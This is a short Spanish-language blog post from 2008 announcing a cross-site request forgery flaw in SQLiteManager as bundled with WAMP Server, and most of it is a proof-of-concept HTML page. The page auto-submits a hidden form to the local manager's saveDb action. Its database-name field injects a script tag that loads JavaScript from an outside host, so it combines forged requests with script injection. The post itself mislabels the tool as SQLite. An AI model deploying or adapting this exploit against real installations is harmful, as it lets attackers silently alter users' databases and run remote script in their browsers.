SQLlite vulnerable

lunes, 31 de marzo de 2008 by Azielito

SQLlite es un manejador de bases de datos, muy similar a PHPMyAdmin, viene integrado en el paquete llamado WAMP Server, resulta que vagando por la red me encuentro que es vulnerable a XSRF dando asi acceso a subir, eliminar, modificar bases de datos y sin que el usuario se de cuenta de ello ñ_ñ

aca el P0C


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<body>

<form id="editform" name="editform" method="post" action="http://localhost/sqlitemanager/main.php" enctype="multipart/form-data">
<input type="text" name="dbname" value='"><script src=http://www.0x000000.com/x.js></script><"' />

<input type="text" name="dbVersion" value="2" />
<input type="text" name="dbRealpath" value="" />
<input type="text" name="filename" value="" />
<input type="text" name="dbpath" value="" />
<input type="text" name="action" value="saveDb" />
<input name="Save" value="Save page" type="submit">

</form>

<script>document.forms[0].submit();</script>

</body>
</html>


fuente

Filed under having  

0 comentarios: